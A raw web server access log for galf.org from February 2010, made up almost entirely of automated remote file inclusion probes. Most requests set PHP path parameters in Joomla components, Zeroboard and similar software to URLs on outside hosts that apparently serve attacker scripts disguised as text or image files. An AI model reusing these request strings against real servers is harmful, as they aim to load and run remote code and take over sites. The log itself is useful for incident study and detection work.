125.141.196.78 - - [15/Feb/2010:02:15:16 -0800] "GET /logs/access_091228.log%20%20/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.78.112.81 - - [15/Feb/2010:02:15:24 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.78.112.81 - - [15/Feb/2010:02:15:24 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.78.112.81 - - [15/Feb/2010:02:15:24 -0800] "GET /logs/access_091102.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:15:41 -0800] "GET /logs/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:15:41 -0800] "GET /homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:15:42 -0800] "GET /logs/access_090928.log%20%20/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:15:47 -0800] "GET /homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:15:47 -0800] "GET /logs/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:15:47 -0800] "GET /logs/access_090928.log%20%20/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:15:47 -0800] "GET /logs/access_091228.log%20%20/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:15:53 -0800] "GET /logs/access_091228.log%20%20/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:16:01 -0800] "GET /homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:16:01 -0800] "GET /logs/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:16:01 -0800] "GET /logs/access_090928.log%20%20/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.78.112.81 - - [15/Feb/2010:02:16:02 -0800] "GET /logs/access_090706.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:16:04 -0800] "GET /logs/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:16:04 -0800] "GET /homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:16:05 -0800] "GET /logs/access_090928.log%20%20/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:16:11 -0800] "GET /logs/access_091228.log%20%20/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:16:12 -0800] "GET /logs/access_091228.log%20%20/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:18:08 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:18:08 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:18:08 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:18:11 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:18:11 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:18:11 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:18:11 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:18:12 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:18:12 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.78.112.81 - - [15/Feb/2010:02:23:21 -0800] "GET /logs/access_091116.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.78.112.81 - - [15/Feb/2010:02:23:26 -0800] "GET /logs/access_091214.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.36.59.85 - - [15/Feb/2010:02:23:50 -0800] "GET /logs/index.php?principal=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.36.59.85 - - [15/Feb/2010:02:23:50 -0800] "GET /index.php?principal=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.36.59.85 - - [15/Feb/2010:02:23:50 -0800] "GET /logs/access_090720.log%20%20/index.php?principal=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.36.59.85 - - [15/Feb/2010:02:23:54 -0800] "GET /logs/access_090713.log%20%20/index.php?principal=http://ricajupanu.go.ro/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.36.59.85 - - [15/Feb/2010:02:28:28 -0800] "GET /logs/access_090720.log/index.php?principal=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.36.59.85 - - [15/Feb/2010:02:28:32 -0800] "GET /logs/access_090713.log/index.php?principal=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [15/Feb/2010:02:28:40 -0800] "GET /myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [15/Feb/2010:02:28:40 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [15/Feb/2010:02:28:40 -0800] "GET /logs/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:02:28:47 -0800] "GET /myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:02:28:47 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:02:28:47 -0800] "GET /logs/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:02:28:57 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:02:28:57 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:29:09 -0800] "GET /logs/access_091228.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:29:22 -0800] "GET /logs/access_100111.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:29:33 -0800] "GET /logs/access_091228.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:29:44 -0800] "GET /logs/access_100111.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:29:51 -0800] "GET /logs/access_091228.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:30:00 -0800] "GET /logs/access_100111.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:30:43 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.87.240.120 - - [15/Feb/2010:02:30:43 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.87.240.120 - - [15/Feb/2010:02:30:43 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.87.240.120 - - [15/Feb/2010:02:32:03 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.87.240.120 - - [15/Feb/2010:02:32:03 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.87.240.120 - - [15/Feb/2010:02:32:04 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.208.14.52 - - [15/Feb/2010:02:32:12 -0800] "GET /logs/access_091116.log/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:32:27 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:02:32:58 -0800] "GET /logs/access_091116.log/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:33:21 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.87.240.120 - - [15/Feb/2010:02:33:21 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.87.240.120 - - [15/Feb/2010:02:33:21 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.87.240.120 - - [15/Feb/2010:02:34:25 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:02:34:29 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:02:34:29 -0800] "GET /logs/access_090810.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:02:34:29 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:02:34:35 -0800] "GET /logs/access_090803.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:35:10 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:02:35:20 -0800] "GET /logs/access_090803.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:02:35:20 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:02:35:20 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.249.103.31 - - [15/Feb/2010:02:35:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.249.103.31 - - [15/Feb/2010:02:35:47 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.249.103.31 - - [15/Feb/2010:02:35:47 -0800] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.112.161 - - [15/Feb/2010:02:37:36 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
77.88.25.28 - - [15/Feb/2010:02:37:51 -0800] "GET /logs/access_090713.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
60.251.165.181 - - [15/Feb/2010:02:38:03 -0800] "GET /http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:02:38:16 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:02:38:16 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:02:39:02 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:02:39:02 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
77.221.130.13 - - [15/Feb/2010:02:39:09 -0800] "GET /bbs////delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [15/Feb/2010:02:39:09 -0800] "GET /logs//bbs////delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [15/Feb/2010:02:39:09 -0800] "GET /logs/access.log%20%20//bbs////delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [15/Feb/2010:02:39:10 -0800] "GET /logs//bbs////delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [15/Feb/2010:02:39:10 -0800] "GET /bbs////delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [15/Feb/2010:02:39:10 -0800] "GET /logs/access.log%20%20//bbs////delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.141.1.113 - - [15/Feb/2010:02:39:56 -0800] "GET /logs/access_091228.log%20%20/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.141.1.113 - - [15/Feb/2010:02:39:56 -0800] "GET /logs/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.141.1.113 - - [15/Feb/2010:02:39:56 -0800] "GET /myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.141.1.113 - - [15/Feb/2010:02:40:08 -0800] "GET /logs/access_090803.log%20%20/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:02:40:27 -0800] "GET /logs/access_100201.log%20%20//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:02:40:27 -0800] "GET /write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:02:40:27 -0800] "GET /logs//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:02:40:31 -0800] "GET /logs/access_100125.log%20%20//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:02:41:07 -0800] "GET /logs//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:02:41:07 -0800] "GET /write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:02:41:07 -0800] "GET /logs/access_100201.log%20%20//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:02:41:12 -0800] "GET /logs/access_100125.log%20%20//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:42:56 -0800] "GET /logs/access.log////?_zb_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:42:56 -0800] "GET /logs/access_091123.log////?_zb_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:42:56 -0800] "GET ///?_zb_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:42:56 -0800] "GET /logs////?_zb_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [15/Feb/2010:02:43:12 -0800] "GET /logs/access_090720.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [15/Feb/2010:02:43:12 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [15/Feb/2010:02:43:12 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:43:16 -0800] "GET /logs/access_091123.log////?_zb_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:43:16 -0800] "GET /logs/access.log////?_zb_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:43:16 -0800] "GET ///?_zb_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:43:16 -0800] "GET /logs////?_zb_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:43:18 -0800] "GET /logs/access.log////?_zb_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:43:18 -0800] "GET /logs/access_091123.log////?_zb_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:43:18 -0800] "GET ///?_zb_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:43:18 -0800] "GET /logs////?_zb_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [15/Feb/2010:02:44:25 -0800] "GET /logs/access_090907.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [15/Feb/2010:02:44:31 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [15/Feb/2010:02:44:31 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [15/Feb/2010:02:44:34 -0800] "GET /logs/access_090720.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:02:46:43 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:02:46:44 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
112.78.112.81 - - [15/Feb/2010:02:46:51 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
